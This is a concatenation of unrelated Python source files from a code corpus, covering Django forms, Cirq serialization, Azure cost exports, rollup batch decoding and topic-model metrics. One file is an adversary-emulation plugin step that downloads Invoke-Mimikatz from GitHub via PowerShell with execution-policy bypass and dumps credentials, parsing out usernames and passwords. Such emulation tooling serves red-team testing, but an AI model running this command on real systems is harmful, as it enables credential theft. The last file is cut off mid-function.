use_step_matcher("re")
@given("we have an instance of ISBN and a ISBN number")
def step_impl(context):
context.isbn = ISBN()
@when("isbn number equal to (?P<isbn>.+)")
def step_impl(context, isbn):
context.result = context.isbn.validate(isbn)
@then("validation result should be equal to (?P<result>.+)")
def step_impl(context, result):
assert context.result == eval(result)
| StarcoderdataPython |
1764248 | from django import forms
from django.conf import settings
from qa_moderator.questions.models import Question
class QuestionForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(QuestionForm, self).__init__(*args, **kwargs)
self.fields['moderator_num'].widget = forms.HiddenInput()
self.fields['event'].widget = forms.HiddenInput()
class Meta:
model = Question
fields = ['id', 'question', 'moderator_num', 'event']
def save(self, commit=True):
max_num_moderators = settings.QUESTIONS_MAX_MODERATORS_NUM
question_data = self.cleaned_data
current_moderator = 1
if Question.objects.count() > 0:
last_question_moderator = Question.objects.last().moderator_num
current_moderator = last_question_moderator + 1
if current_moderator > max_num_moderators:
current_moderator = 1
question_data['moderator_num'] = current_moderator
question = Question.objects.create(**question_data)
return question
| StarcoderdataPython |
7433 | <reponame>jasonivey/scripts
#!/usr/bin/env python3
# vim:softtabstop=4:ts=4:sw=4:expandtab:tw=120
from ansimarkup import AnsiMarkup, parse
import csv
import datetime
import operator
import os
from pathlib import Path
import re
import sys
import traceback
_VERBOSE = False
user_tags = {
'error' : parse('<bold><red>'),
'name' : parse('<bold><cyan>'),
'value' : parse('<bold><white>'),
}
am = AnsiMarkup(tags=user_tags)
def _assert_msg(msg):
return am.ansistring(f'<error>{msg}</error>')
def _print_name_value(name, max_name_len, value, prefix=None, postfix=None):
prefix = prefix if prefix is not None else ''
postfix = postfix if postfix is not None else ''
lh = am.ansistring(f'<name>{name}</name>')
rh = am.ansistring(f'<value>{value}</value>')
print(f'{prefix}{lh:{max_name_len + lh.delta}} {rh}{postfix}')
def _get_name_value_compact(name, max_name_len, value, prefix=None, postfix=None):
prefix = prefix if prefix is not None else ''
postfix = postfix if postfix is not None else ''
return am.ansistring(f'{prefix}<name>{name}</name> <value>{value}</value>{postfix}')
def _get_timezone_info():
return datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo
def _convert_date_time(dt):
return f'{dt:%d-%b-%Y %I:%M:%S%p %Z}'.replace('AM', 'am').replace('PM', 'pm')
def _parse_datetime(dt_str):
dt = datetime.datetime.strptime(dt_str, '%m/%d/%Y %I:%M %p') # Example '11/08/2011 03:00 PM'
tz = _get_timezone_info()
return dt.replace(tzinfo=tz)
def _parse_datetime_row(row):
return _parse_datetime(' '.join(row[2:4]))
def _parse_appointment_row(row, index):
assert len(row) >= 4, _assert_msg(f'row {index} does not have 4 or more columns as required')
appt_time = _parse_datetime(' '.join(row[2:4]))
appt_type = row[0].title()
doctor = row[1].title()
return appt_time, appt_type, doctor
def parse_doctor_appointments(file_name):
path = Path(os.path.expandvars(file_name))
with path.open(newline='', encoding='utf-8') as handle:
reader = csv.reader(handle)
sorted_rows = sorted(reader, key=lambda x: _parse_datetime_row(x))
for index, row in enumerate(sorted_rows):
yield _parse_appointment_row(row, index)
def get_doctors_appointments():
MAX_WIDTH = len('Appointment:')
file_name = '$HOME/Downloads/crump-visits.csv'
for appt_time, appt_type, doctor in parse_doctor_appointments(file_name):
s = _get_name_value_compact('Appointment:', None, _convert_date_time(appt_time), postfix=', ')
s += _get_name_value_compact('Type:', None, appt_type, postfix=', ')
print(s + _get_name_value_compact('Doctor:', None, doctor))
def main(args):
try:
get_doctors_appointments()
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback, file=sys.stdout)
return 1
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
| StarcoderdataPython |
1700325 | <reponame>wietze/bsides-ldn-2019
from plugins.adversary.app.operation.operation import Step, OPDomain, OPCredential, OPRat, OPVar, OPHost, OPUser, OPFile
from plugins.adversary.app.commands import *
from plugins.adversary.app.custom import *
class DumpCreds(Step):
""" Description:
This step uses Invoke-Mimikatz to get credentials of the current system.
Requirements:
An elevated RAT.
"""
display_name = "dump_creds"
summary = "Run Invoke-Mimikatz to obtain credentials."
attack_mapping = [('T1003', 'Credential Access'), ('T1064', 'Defense Evasion'), ('T1064', 'Execution'), ('T1086', 'Execution'), ('T1106', 'Execution')]
preconditions = [("rat", OPRat({"elevated": True})),
("host", OPHost(OPVar("rat.host")))]
postconditions = [("domain_g", OPDomain),
("credential_g", OPCredential),
("host_g", OPHost),
("user_g", OPUser({'$in': OPVar("host.admins")})),
("file_g", OPFile)]
postproperties = ["credential_g.password", "user_g.username", "user_g.is_group", "domain_g.windows_domain"]
hints = [("user_g", OPUser({'$in': OPVar('host_g.admins'), "domain": OPVar("domain_g")})),
("credential_g", OPCredential({"user": OPVar("user_g")}))]
significant_parameters = ["host"]
@staticmethod
def description(rat):
return "Running mimikatz to dump credentials on {}".format(rat.host.fqdn)
@staticmethod
def parser(mimikatz_output):
credentials = []
results = re.findall('Username\s*:\s+(.*)\s*\* Domain\s*:\s+(.*)\s*\* Password\s*:\s+(.*)', mimikatz_output, re.MULTILINE)
for result in results:
if not result[2] or result[2] == '(null)':
continue
credentials.append({'username': result[0].lower().strip(), 'domain': result[1].lower().strip(), 'password': result[2].strip()})
return credentials
@staticmethod
async def action(operation, rat, domain_g, credential_g, host_g, user_g, file_g):
# Step 1: run Mimikatz in memory
MIMIKATZ_URL = "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1"
ps_parameters = ['powershell.exe', '-exec', 'bypass', '-C', 'IEX(IWR \'{}\'); Invoke-Mimikatz -DumpCreds'.format(MIMIKATZ_URL)]
async def drop_file(path, contents):
await operation.drop_file_contents(rat, file_path_dest=path, file_contents=bytes(contents, 'utf-8'))
async def register_file(path):
await file_g({'path': path, 'host': rat.host})
cmd = command.CustomCommandLine(ps_parameters)
await cmd.generate(drop_file, register_file)
credentials = (await operation.execute_shell_command(rat, cmd, DumpCreds.parser))
# Step 2: parse credentials
users = []
for cred in credentials:
# Generate User object
user = {'username': cred['username'], 'is_group': False}
if cred['domain'].upper() == rat.host.hostname.upper():
user['host'] = rat.host
else:
user['domain'] = await domain_g({'windows_domain': cred['domain']})
user_obj = await user_g(user)
# Generate Credential object
await credential_g({'password': cred['password'], 'found_on_host': rat.host, 'user': user_obj})
return True
@staticmethod
async def cleanup(cleaner, file_g):
for entry in file_g:
await cleaner.delete(entry)
| StarcoderdataPython |
4824195 | # Copyright 2020 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
from typing import Dict, TYPE_CHECKING
from cirq.protocols.json_serialization import ObjectFactory
if TYPE_CHECKING:
import cirq.ops.pauli_gates
import cirq.devices.unconstrained_device
@functools.lru_cache(maxsize=1)
def _class_resolver_dictionary() -> Dict[str, ObjectFactory]:
import cirq
from cirq.ops import raw_types
import pandas as pd
import numpy as np
from cirq.devices.noise_model import _NoNoiseModel
from cirq.experiments import CrossEntropyResult, CrossEntropyResultDict, GridInteractionLayer
from cirq.experiments.grid_parallel_two_qubit_xeb import GridParallelXEBMetadata
def _identity_operation_from_dict(qubits, **kwargs):
return cirq.identity_each(*qubits)
def single_qubit_matrix_gate(matrix):
if not isinstance(matrix, np.ndarray):
matrix = np.array(matrix, dtype=np.complex128)
return cirq.MatrixGate(matrix, qid_shape=(matrix.shape[0],))
def two_qubit_matrix_gate(matrix):
if not isinstance(matrix, np.ndarray):
matrix = np.array(matrix, dtype=np.complex128)
return cirq.MatrixGate(matrix, qid_shape=(2, 2))
import sympy
return {
'AmplitudeDampingChannel': cirq.AmplitudeDampingChannel,
'AsymmetricDepolarizingChannel': cirq.AsymmetricDepolarizingChannel,
'BitFlipChannel': cirq.BitFlipChannel,
'BitstringAccumulator': cirq.work.BitstringAccumulator,
'ProductState': cirq.ProductState,
'CCNotPowGate': cirq.CCNotPowGate,
'CCXPowGate': cirq.CCXPowGate,
'CCZPowGate': cirq.CCZPowGate,
'CNotPowGate': cirq.CNotPowGate,
'ControlledGate': cirq.ControlledGate,
'ControlledOperation': cirq.ControlledOperation,
'CSwapGate': cirq.CSwapGate,
'CXPowGate': cirq.CXPowGate,
'CZPowGate': cirq.CZPowGate,
'CrossEntropyResult': CrossEntropyResult,
'CrossEntropyResultDict': CrossEntropyResultDict,
'Circuit': cirq.Circuit,
'CircuitOperation': cirq.CircuitOperation,
'CliffordState': cirq.CliffordState,
'CliffordTableau': cirq.CliffordTableau,
'DepolarizingChannel': cirq.DepolarizingChannel,
'ConstantQubitNoiseModel': cirq.ConstantQubitNoiseModel,
'Duration': cirq.Duration,
'FrozenCircuit': cirq.FrozenCircuit,
'FSimGate': cirq.FSimGate,
'DensePauliString': cirq.DensePauliString,
'MutableDensePauliString': cirq.MutableDensePauliString,
'MutablePauliString': cirq.MutablePauliString,
'ObservableMeasuredResult': cirq.work.ObservableMeasuredResult,
'GateOperation': cirq.GateOperation,
'GeneralizedAmplitudeDampingChannel': cirq.GeneralizedAmplitudeDampingChannel,
'GlobalPhaseOperation': cirq.GlobalPhaseOperation,
'GridInteractionLayer': GridInteractionLayer,
'GridParallelXEBMetadata': GridParallelXEBMetadata,
'GridQid': cirq.GridQid,
'GridQubit': cirq.GridQubit,
'HPowGate': cirq.HPowGate,
'ISwapPowGate': cirq.ISwapPowGate,
'IdentityGate': cirq.IdentityGate,
'IdentityOperation': _identity_operation_from_dict,
'InitObsSetting': cirq.work.InitObsSetting,
'LinearDict': cirq.LinearDict,
'LineQubit': cirq.LineQubit,
'LineQid': cirq.LineQid,
'MatrixGate': cirq.MatrixGate,
'MeasurementKey': cirq.MeasurementKey,
'MeasurementGate': cirq.MeasurementGate,
'_MeasurementSpec': cirq.work._MeasurementSpec,
'Moment': cirq.Moment,
'_XEigenState': cirq.value.product_state._XEigenState, # type: ignore
'_YEigenState': cirq.value.product_state._YEigenState, # type: ignore
'_ZEigenState': cirq.value.product_state._ZEigenState, # type: ignore
'_NoNoiseModel': _NoNoiseModel,
'NamedQubit': cirq.NamedQubit,
'NamedQid': cirq.NamedQid,
'NoIdentifierQubit': cirq.testing.NoIdentifierQubit,
'_PauliX': cirq.ops.pauli_gates._PauliX,
'_PauliY': cirq.ops.pauli_gates._PauliY,
'_PauliZ': cirq.ops.pauli_gates._PauliZ,
'ParamResolver': cirq.ParamResolver,
'PasqalDevice': cirq.pasqal.PasqalDevice,
'PasqalVirtualDevice': cirq.pasqal.PasqalVirtualDevice,
'ParallelGateOperation': cirq.ParallelGateOperation,
'PauliString': cirq.PauliString,
'PhaseDampingChannel': cirq.PhaseDampingChannel,
'PhaseFlipChannel': cirq.PhaseFlipChannel,
'PhaseGradientGate': cirq.PhaseGradientGate,
'PhasedFSimGate': cirq.PhasedFSimGate,
'PhasedISwapPowGate': cirq.PhasedISwapPowGate,
'PhasedXPowGate': cirq.PhasedXPowGate,
'PhasedXZGate': cirq.PhasedXZGate,
'RandomGateChannel': cirq.RandomGateChannel,
'QuantumFourierTransformGate': cirq.QuantumFourierTransformGate,
'RepetitionsStoppingCriteria': cirq.work.RepetitionsStoppingCriteria,
'ResetChannel': cirq.ResetChannel,
'SingleQubitMatrixGate': single_qubit_matrix_gate,
'SingleQubitPauliStringGateOperation': cirq.SingleQubitPauliStringGateOperation,
'SingleQubitReadoutCalibrationResult': cirq.experiments.SingleQubitReadoutCalibrationResult,
'StabilizerStateChForm': cirq.StabilizerStateChForm,
'SwapPowGate': cirq.SwapPowGate,
'SymmetricalQidPair': cirq.SymmetricalQidPair,
'TaggedOperation': cirq.TaggedOperation,
'ThreeDQubit': cirq.pasqal.ThreeDQubit,
'Result': cirq.Result,
'Rx': cirq.Rx,
'Ry': cirq.Ry,
'Rz': cirq.Rz,
'TwoDQubit': cirq.pasqal.TwoDQubit,
'TwoQubitMatrixGate': two_qubit_matrix_gate,
'_UnconstrainedDevice': cirq.devices.unconstrained_device._UnconstrainedDevice,
'VarianceStoppingCriteria': cirq.work.VarianceStoppingCriteria,
'VirtualTag': cirq.VirtualTag,
'WaitGate': cirq.WaitGate,
'_QubitAsQid': raw_types._QubitAsQid,
# The formatter keeps putting this back
# pylint: disable=line-too-long
'XEBPhasedFSimCharacterizationOptions': cirq.experiments.XEBPhasedFSimCharacterizationOptions,
# pylint: enable=line-too-long
'XPowGate': cirq.XPowGate,
'XXPowGate': cirq.XXPowGate,
'YPowGate': cirq.YPowGate,
'YYPowGate': cirq.YYPowGate,
'ZPowGate': cirq.ZPowGate,
'ZZPowGate': cirq.ZZPowGate,
# not a cirq class, but treated as one:
'pandas.DataFrame': pd.DataFrame,
'pandas.Index': pd.Index,
'pandas.MultiIndex': pd.MultiIndex.from_tuples,
'sympy.Symbol': sympy.Symbol,
'sympy.Add': lambda args: sympy.Add(*args),
'sympy.Mul': lambda args: sympy.Mul(*args),
'sympy.Pow': lambda args: sympy.Pow(*args),
'sympy.Float': lambda approx: sympy.Float(approx),
'sympy.Integer': sympy.Integer,
'sympy.Rational': sympy.Rational,
'sympy.pi': lambda: sympy.pi,
'sympy.E': lambda: sympy.E,
'sympy.EulerGamma': lambda: sympy.EulerGamma,
'complex': complex,
}
| StarcoderdataPython |
3248599 | <gh_stars>100-1000
from neo.Core.Mixins import VerifiableMixin
class InventoryMixin(VerifiableMixin):
def __init__(self):
super(InventoryMixin, self).__init__()
self.InventoryType = None
def Verify(self):
pass
| StarcoderdataPython |
82831 | import os
from dodo_commands.dependencies import (yaml_round_trip_dump,
yaml_round_trip_load)
from dodo_commands.framework.config import merge_into_config
from dodo_commands.framework.paths import Paths
def create_config_dir(config_dir):
"""Install the dir with dodo_commands resources."""
os.makedirs(config_dir)
config_filename = os.path.join(config_dir, "config.yaml")
default_config = {
"ROOT": {
"command_path": [
os.path.join(Paths().default_commands_dir(expanduser=False), "*")
],
"version": "1.0.0",
}
}
default_config_mixin_filename = Paths().default_config_mixin_filename()
if os.path.exists(default_config_mixin_filename):
with open(default_config_mixin_filename) as f:
default_config_mixin = yaml_round_trip_load(f.read())
merge_into_config(default_config, default_config_mixin)
with open(config_filename, "w") as f:
for key in default_config:
f.write(yaml_round_trip_dump({key: default_config[key]}))
f.write(os.linesep)
os.makedirs(os.path.join(config_dir, ".dodo-start-env"))
| StarcoderdataPython |
58968 | <reponame>AhnSeongHyun/plate
# -*- coding:utf-8 -*-
from os.path import join
from os.path import split
from bs4 import BeautifulSoup
from jinja2 import Environment
from jinja2 import PackageLoader
from plate.common import is_absolute
def local_url_for(endpoint, **values):
dir_path, file_path = split(values['filename'])
dir_path = dir_path[0].replace("/", "./") + dir_path[1:]
return join(dir_path, file_path)
def convert_static_html(config, contents):
"""
Render plate template to HTML
In case of ``python plate.py -m convert`` use this method.
:param config: config instance
:param contents: converted html from markdown
:return: rendered html
"""
try:
env = Environment(loader=PackageLoader('plate', 'templates'),
autoescape=False,
extensions=['jinja2.ext.autoescape'])
t = env.get_template('index.html')
config.SUPPORT_LANG = [str(lang) for lang in config.SUPPORT_LANG]
logo_img = config.LOGO_IMG if config.exist('LOGO_IMG') else None
logo_title = config.LOGO_TITLE if config.exist('LOGO_TITLE') else None
rendered_template = t.render(API_TITLE=config.TITLE,
IS_SEARCH=config.SEARCH_ON,
LOGO_TITLE=logo_title,
LOGO_IMG=logo_img,
IS_LOGO_ABSOLUTE_URL=is_absolute(logo_img),
SUPPORT_LANGUAGES=config.SUPPORT_LANG,
DOCS=contents,
COPYRIGHT=config.COPYRIGHT,
FAVICON=config.FAVICON,
url_for=local_url_for)
soup = BeautifulSoup(rendered_template)
return soup.prettify()
except Exception as e:
raise e
| StarcoderdataPython |
1681632 | from argoverse.evaluation.eval_tracking import eval_tracks
import os.path
data_dir = "/data/argoai"
labels_dir = os.path.join(data_dir, "downloads/argoverse-tracking/test")
our_output = os.path.join(data_dir, "marius/argoverse-tracker")
log_id = "028d5cb1-f74d-366c-85ad-84fde69b0fd3"
labels = os.path.join(labels_dir, log_id)
run_id = "1ff75cd1-3613-11ea-8001-00d86118ce97/lane_1_fixbbox_1_rcnn_1_map_const_v_both_roi"
generated = os.path.join(our_output, run_id, log_id)
output = os.path.join(our_output, "report.txt")
centroid_method = "average" # "label_center"
"""
"num_frames",
"mota" - multiple object tracker accuracy
"motp_c" - multiple object tracker precision centroid
"motp_o" - multiple object tracker precision orientation
"motp_i" - multiple object tracker precision iou
"idf1" - global min-cost f1 score
"mostly_tracked" - number of objects tracked for at least 80% of their lifespan
"mostly_lost" - number of objectrs tracked for less than 20% of their lifespan
"num_false_positives",
"num_misses",
"num_switches" - number of track switches
"num_fragmentations" - total number of switches from tracked to untracked
f"{fn} {num_frames} {mota:.2f} {motp_c:.2f} {motp_o:.2f} {motp_i:.2f} {idf1:.2f} {most_track:.2f} "
f"{most_lost:.2f} {num_fp} {num_miss} {num_switch} {num_flag} \n"
"""
with open(output, "w") as out_file:
eval_tracks([generated], [labels], 0, 100, out_file, "average")
print(f"wrote file {output}") | StarcoderdataPython |
3286323 | from avalon import api
import pyblish.api
import openpype.api
from openpype.pipeline import PublishXmlValidationError
from openpype.hosts.aftereffects.api import get_stub
class ValidateInstanceAssetRepair(pyblish.api.Action):
"""Repair the instance asset with value from Context."""
label = "Repair"
icon = "wrench"
on = "failed"
def process(self, context, plugin):
# Get the errored instances
failed = []
for result in context.data["results"]:
if (result["error"] is not None and result["instance"] is not None
and result["instance"] not in failed):
failed.append(result["instance"])
# Apply pyblish.logic to get the instances for the plug-in
instances = pyblish.api.instances_by_plugin(failed, plugin)
stub = get_stub()
for instance in instances:
data = stub.read(instance[0])
data["asset"] = api.Session["AVALON_ASSET"]
stub.imprint(instance[0], data)
class ValidateInstanceAsset(pyblish.api.InstancePlugin):
"""Validate the instance asset is the current selected context asset.
As it might happen that multiple worfiles are opened at same time,
switching between them would mess with selected context. (From Launcher
or Ftrack).
In that case outputs might be output under wrong asset!
Repair action will use Context asset value (from Workfiles or Launcher)
Closing and reopening with Workfiles will refresh Context value.
"""
label = "Validate Instance Asset"
hosts = ["aftereffects"]
actions = [ValidateInstanceAssetRepair]
order = openpype.api.ValidateContentsOrder
def process(self, instance):
instance_asset = instance.data["asset"]
current_asset = api.Session["AVALON_ASSET"]
msg = (
f"Instance asset {instance_asset} is not the same "
f"as current context {current_asset}."
)
if instance_asset != current_asset:
raise PublishXmlValidationError(self, msg)
| StarcoderdataPython |
3209369 | <gh_stars>100-1000
#
# Copyright 2021 Red Hat Inc.
# SPDX-License-Identifier: Apache-2.0
#
"""Azure Service helpers."""
import logging
from tempfile import NamedTemporaryFile
from adal.adal_error import AdalError
from azure.common import AzureException
from azure.core.exceptions import HttpResponseError
from msrest.exceptions import ClientException
from providers.azure.client import AzureClientFactory
LOG = logging.getLogger(__name__)
class AzureServiceError(Exception):
"""Raised when errors are encountered from Azure."""
pass
class AzureCostReportNotFound(Exception):
"""Raised when Azure cost report is not found."""
pass
class AzureService:
"""A class to handle interactions with the Azure services."""
def __init__(
self,
tenant_id,
client_id,
client_secret,
resource_group_name,
storage_account_name,
subscription_id=None,
cloud="public",
):
"""Establish connection information."""
self._resource_group_name = resource_group_name
self._storage_account_name = storage_account_name
self._factory = AzureClientFactory(subscription_id, tenant_id, client_id, client_secret, cloud)
if not self._factory.subscription_id:
raise AzureServiceError("Azure Service missing subscription id.")
self._cloud_storage_account = self._factory.cloud_storage_account(resource_group_name, storage_account_name)
if not self._factory.credentials:
raise AzureServiceError("Azure Service credentials are not configured.")
def get_cost_export_for_key(self, key, container_name):
"""Get the latest cost export file from given storage account container."""
report = None
try:
container_client = self._cloud_storage_account.get_container_client(container_name)
blob_list = container_client.list_blobs(name_starts_with=key)
except (AdalError, AzureException, ClientException) as error:
raise AzureServiceError("Failed to download cost export. Error: ", str(error))
for blob in blob_list:
if key == blob.name:
report = blob
break
if not report:
message = f"No cost report for report name {key} found in container {container_name}."
raise AzureCostReportNotFound(message)
return report
def download_cost_export(self, key, container_name, destination=None):
"""Download the latest cost export file from a given storage container."""
cost_export = self.get_cost_export_for_key(key, container_name)
file_path = destination
if not destination:
temp_file = NamedTemporaryFile(delete=False, suffix=".csv")
file_path = temp_file.name
try:
blob_client = self._cloud_storage_account.get_blob_client(container_name, cost_export.name)
with open(file_path, "wb") as blob_download:
blob_download.write(blob_client.download_blob().readall())
except (AdalError, AzureException, ClientException, IOError) as error:
raise AzureServiceError("Failed to download cost export. Error: ", str(error))
return file_path
def get_latest_cost_export_for_path(self, report_path, container_name):
"""Get the latest cost export file from given storage account container."""
latest_report = None
if not container_name:
message = "Unable to gather latest export as container name is not provided."
LOG.warning(message)
raise AzureCostReportNotFound(message)
try:
container_client = self._cloud_storage_account.get_container_client(container_name)
blob_list = container_client.list_blobs(name_starts_with=report_path)
for blob in blob_list:
if report_path in blob.name and not latest_report:
latest_report = blob
elif report_path in blob.name and blob.last_modified > latest_report.last_modified:
latest_report = blob
if not latest_report:
message = f"No cost report found in container {container_name} for " f"path {report_path}."
raise AzureCostReportNotFound(message)
return latest_report
except (AdalError, AzureException, ClientException) as error:
raise AzureServiceError("Failed to download cost export. Error: ", str(error))
except HttpResponseError as httpError:
if httpError.status_code == 403:
message = (
"An authorization error occurred attempting to gather latest export"
f" in container {container_name} for "
f"path {report_path}."
)
else:
message = (
"Unknown error occurred attempting to gather latest export"
f" in container {container_name} for "
f"path {report_path}."
)
error_msg = message + f" Azure Error: {httpError}."
LOG.warning(error_msg)
raise AzureCostReportNotFound(message)
def describe_cost_management_exports(self):
"""List cost management export."""
scope = f"/subscriptions/{self._factory.subscription_id}"
expected_resource_id = (
f"/subscriptions/{self._factory.subscription_id}/resourceGroups/"
f"{self._resource_group_name}/providers/Microsoft.Storage/"
f"storageAccounts/{self._storage_account_name}"
)
export_reports = []
try:
cost_management_client = self._factory.cost_management_client
management_reports = cost_management_client.exports.list(scope)
for report in management_reports.value:
if report.delivery_info.destination.resource_id == expected_resource_id:
report_def = {
"name": report.name,
"container": report.delivery_info.destination.container,
"directory": report.delivery_info.destination.root_folder_path,
}
export_reports.append(report_def)
except (AdalError, AzureException, ClientException) as exc:
raise AzureCostReportNotFound(exc)
return export_reports
| StarcoderdataPython |
1654685 | # Copyright 2021 DAI Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at: http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
import requests
from ethereum.transactions import Transaction
def decode_from_4byte(method_sig, decoded_methods):
if method_sig not in decoded_methods:
url = (
"https://www.4byte.directory/api/v1/signatures/?hex_signature=" + method_sig
)
r = requests.get(url).json()
if len(r["results"]):
text_sig = r["results"][-1]["text_signature"]
else:
text_sig = f"{method_sig}()"
decoded_methods[method_sig] = text_sig
else:
text_sig = decoded_methods.get(method_sig)
return text_sig
def decode_sequencer_batch(data):
BATCH_CONTEXT_START_POS = 15
BATCH_CONTEXT_SIZE = 16
TX_DATA_HEADER_SIZE = 3
def load_call_data(data, position, shift):
sub_data = data[2 + 2 * position :]
value = int(sub_data[: shift * 2], 16)
return value
def load_tx_data(data, position, length):
def ECDSA_recover(transaction):
tx = Transaction(
transaction["nonce"],
transaction["gas_price"],
transaction["gas_limit"],
b""
if transaction["to_address"]
== "0x0000000000000000000000000000000000000000"
else transaction["to_address"],
transaction["value"],
bytes.fromhex(transaction["data"]),
int(transaction["v"], 16) + 55,
int(transaction["r"], 16),
int(transaction["s"], 16),
)
tx_hash = "0x" + tx.hash.hex()
from_address = "0x" + tx.sender.hex()
return from_address, tx_hash
sub_data = data[2 + 2 * position :][: length * 2]
is_eip155 = int(sub_data[:2])
r = sub_data[2 : 33 * 2]
s = sub_data[33 * 2 : 65 * 2]
v = sub_data[65 * 2 : 66 * 2]
gas_limit = int(sub_data[66 * 2 : 69 * 2], 16)
gas_price = int(sub_data[69 * 2 : 72 * 2], 16)
nonce = int(sub_data[72 * 2 : 75 * 2], 16)
to_address = "0x" + sub_data[75 * 2 : 95 * 2]
data = sub_data[95 * 2 :]
signature = decode_from_4byte("0x" + data[:8], decoded_methods)
input_data = data[8:]
transaction = dict(
eip155=(is_eip155 == 0),
r=r,
s=s,
v=v,
gas_limit=gas_limit,
gas_price=gas_price,
nonce=nonce,
to_address=to_address,
value=0,
data=data,
signature=signature,
input=input_data,
)
transaction["from_address"], transaction["tx_hash"] = ECDSA_recover(transaction)
transaction.pop("data")
return transaction
decoded_methods = dict()
data = "0x00000000" + data
shouldStartAtElement = load_call_data(data, 4, 5)
totalElementsToAppend = load_call_data(data, 9, 3)
numContexts = load_call_data(data, 12, 3)
numTransactions = 0
batch = dict(
shouldStartAtElement=shouldStartAtElement,
totalElementsToAppend=totalElementsToAppend,
numContexts=numContexts,
contexts=[],
)
nextTransactionPtr = BATCH_CONTEXT_START_POS + BATCH_CONTEXT_SIZE * numContexts
for i in range(numContexts):
contextPtr = 15 + i * BATCH_CONTEXT_SIZE
numSequencedTransactions = load_call_data(data, contextPtr, 3)
numSubsequentQueueTransactions = load_call_data(data, contextPtr + 3, 3)
ctxTimestamp = datetime.utcfromtimestamp(
load_call_data(data, contextPtr + 6, 5)
)
ctxBlockNumber = load_call_data(data, contextPtr + 11, 5)
context = dict(
numSequencedTransactions=numSequencedTransactions,
numSubsequentQueueTransactions=numSubsequentQueueTransactions,
ctxTimestamp=ctxTimestamp,
ctxBlockNumber=ctxBlockNumber,
ctxSequencedTransactions=[],
)
for _ in range(numSequencedTransactions):
txDataLength = load_call_data(data, nextTransactionPtr, 3)
transactionData = load_tx_data(data, nextTransactionPtr + 3, txDataLength)
context["ctxSequencedTransactions"].append(transactionData)
numTransactions += 1
nextTransactionPtr += TX_DATA_HEADER_SIZE + txDataLength
batch["contexts"].append(context)
batch["numTransactions"] = numTransactions
return batch
def decode_ovm_message(data):
target = gas_limit = data
signature = input_data = None
transaction = dict(
eip155=Transaction,
r=None,
s=None,
v=None,
gas_limit=gas_limit,
gas_price=0,
nonce=0,
to_address=target,
value=0,
data=data,
signature=signature,
input=input_data,
)
context = dict(
ctxTimestamp=None, ctxBlockNumber=None, ctxSequencedTransactions=[transaction]
)
batch = dict(numContexts=1, contexts=[context])
return batch
| StarcoderdataPython |
1777669 | <reponame>LittleNed/toontown-stride
from toontown.coghq.SpecImports import *
LobbyParent = 10014
LobbyCell = 0
BattleCells = {}
ReserveCogData = []
CogData = [] | StarcoderdataPython |
1602617 | #import functions
from mcpi.minecraft import Minecraft
from time import sleep
#define variables
mc = Minecraft.create()
flower = 38
#mainloop
while True:
x, y, z = mc.player.getPos()
mc.setBlock(x, y, z, flower)
sleep(0.1)
| StarcoderdataPython |
1654115 | <reponame>jazzband/join
import wrapt
from flask import flash, redirect
from flask_login import current_user
from ..account.views import default_url
def member_required(next_url=None, message=None):
if message is None:
message = "Sorry but you're not a member of Jazzband at the moment."
@wrapt.decorator
def wrapper(wrapped, instance, args, kwargs):
"""
If you decorate a view with this, it will ensure that the current user is
a Jazzband member.
:param func: The view function to decorate.
:type func: function
"""
nonlocal next_url
if next_url is None:
next_url = default_url()
if (
not current_user.is_member
or current_user.is_banned
or current_user.is_restricted
):
flash(message)
return redirect(next_url)
return wrapped(*args, **kwargs)
return wrapper
| StarcoderdataPython |
199807 | from .dart_command import DartCommand
import sublime_plugin
class PubAddCommand(DartCommand):
def run(self, package_name):
if project := super().project():
project.pub_add(package_name)
def input(self, _):
return PackageNameInputHandler()
class PackageNameInputHandler(sublime_plugin.TextInputHandler):
def name(self):
return "package_name"
def validate(self, arg: str) -> bool:
return bool(arg)
def placeholder(self):
return "package_name[:@x.y.z]"
| StarcoderdataPython |
1604336 | import torch
import numpy as np
def get_topic_diversity(beta, topk):
num_topics = beta.shape[0]
list_w = np.zeros((num_topics, topk))
for k in range(num_topics):
idx = beta[k,:].argsort()[-topk:][::-1]
list_w[k,:] = idx
n_unique = len(np.unique(list_w))
TD = n_unique / (topk * num_topics)
print('Topic diversity is: {}'.format(TD))
def get_document_frequency(data, wi, wj=None):
if wj is None:
D_wi = 0
for l in range(len(data)):
doc = data[l].squeeze(0)
if len(doc) == 1:
continue
else:
doc = doc.squeeze()
if wi in doc:
D_wi += 1
return D_wi
D_wj = 0
D_wi_wj = 0
for l in range(len(data)):
doc = data[l].squeeze(0)
if len(doc) == 1:
doc = [doc.squeeze()]
else:
doc = doc.squeeze()
if wj in doc:
D_wj += 1
if wi in doc:
D_wi_wj += 1
return D_wj, D_wi_wj
def get_topic_coherence(beta, data, vocab):
D = len(data) ## number of docs...data is list of documents
#print('D: ', D)
TC = []
num_topics = len(beta)
for k in range(num_topics):
#print('k: {}/{}'.format(k, num_topics))
top_10 = list(beta[k].argsort()[-11:][::-1])
top_words = [vocab[a] for a in top_10]
TC_k = 0
counter = 0
for i, word in enumerate(top_10):
# get D(w_i)
D_wi = get_document_frequency(data, word)
j = i + 1
tmp = 0
while j < len(top_10) and j > i:
# get D(w_j) and D(w_i, w_j)
D_wj, D_wi_wj = get_document_frequency(data, word, top_10[j])
# get f(w_i, w_j)
if D_wi_wj == 0:
f_wi_wj = -1
else:
